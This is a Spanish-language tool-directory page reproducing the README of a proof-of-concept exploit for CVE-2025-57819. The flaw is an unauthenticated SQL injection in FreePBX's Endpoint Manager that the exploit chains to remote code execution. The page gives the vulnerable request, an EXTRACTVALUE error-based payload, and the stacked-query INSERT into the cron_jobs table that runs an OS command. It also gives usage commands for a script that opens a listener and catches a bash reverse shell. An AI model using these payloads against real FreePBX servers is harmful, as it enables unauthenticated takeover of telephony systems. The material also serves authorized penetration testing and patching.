Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-57819-poc — CVE-2025-57819 -> rce | Kitploit
Herramientas/GitHubGitHub/b4sh2/cve-2025-57819-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlDesarrollo de Payloads
GitHubb4sh2/cve-2025-57819-poc

CVE-2025-57819-poc

CVE-2025-57819 -> rce

Ver Repositorio
7257hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-57819 — FreePBX SQLi no autenticada → RCE

Exploit de un solo disparo para la inyección SQL no autenticada del Endpoint Manager de FreePBX (CVE-2025-57819), encadenada a ejecución remota de código mediante la tabla cron_jobs de FreePBX.

Solo para pruebas de seguridad autorizadas / uso en CTF.


Vulnerabilidad

El manejador ajax del módulo endpoint concatena el parámetro brand directamente en una consulta SQL, y la ruta del módulo FreePBX\modules\endpoint\ajax omite la verificación de Referrer/autenticación de ajax. Esto proporciona una inyección SQL no autenticada basada en errores (mediante EXTRACTVALUE), con escrituras de consultas apiladas habilitadas.

Punto de inyección:

GET /admin/ajax.php?module=FreePBX\modules\endpoint\ajax
    &command=model&template=x&model=model&brand=<INJECTION>

Prueba (lectura basada en errores):

brand=x' AND EXTRACTVALUE(1,CONCAT('~',(SELECT USER()),'~')) -- -
→ {"error":{"message":"... XPATH syntax error: '~freepbxuser@localhost~' ..."}}

Versiones afectadas: FreePBX 15 < 15.0.66, 16 < 16.0.89, 17 < 17.0.3.

Técnica de RCE

La inyección es de solo lectura por sí sola, pero las consultas apiladas permiten escrituras. FreePBX ejecuta tareas de la tabla cron_jobs mediante su gestor de cron, por lo que insertar una fila produce ejecución arbitraria de comandos (en ~60s, programación * * * * *):

INSERT INTO cron_jobs
  (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order)
VALUES ('sysadmin','<job>','<os-command>',NULL,'* * * * *',30,1,1);

El comando inyectado es una reverse shell de bash. La fila de cron se elimina automáticamente tras la primera conexión para evitar conexiones repetidas.

Requisitos

pip install requests urllib3

Python 3. La detección de IP integrada (-i/--interface) es exclusiva de Linux; usa --ip en otras plataformas.

Uso

# Defaults: interface tun0, port 4444 — starts listener, exploits, drops a shell
python3 exploit.py http://{target}

# Pick a different interface / port
python3 exploit.py http://{target} -i eth0 -p 9001

# Set the listener IP explicitly
python3 exploit.py http://{target} --ip 10.10.15.52

python3 exploit.py --help

El script:

  1. Confirma la SQLi (filtra la versión de la BD).
  2. Inicia un listener TCP en el puerto elegido.
  3. Inyecta la tarea cron de reverse shell y verifica que la fila se haya insertado.
  4. Espera ~70s a que se reciba la conexión y luego te deja en una shell interactiva (con un intento automático de mejora a PTY).
  5. Limpia la fila de cron inyectada.

Referencias

  • Horizon3.ai — CVEs actualizados de FreePBX: Bypass de autenticación y RCE
  • watchTowr Labs — FreePBX CVE-2025-57819
  • watchTowr PoC (GitHub)
  • NVD — CVE-2025-57819
  • Aviso de FreePBX GHSA-m42g-xg4c-5f3h
Descargar herramienta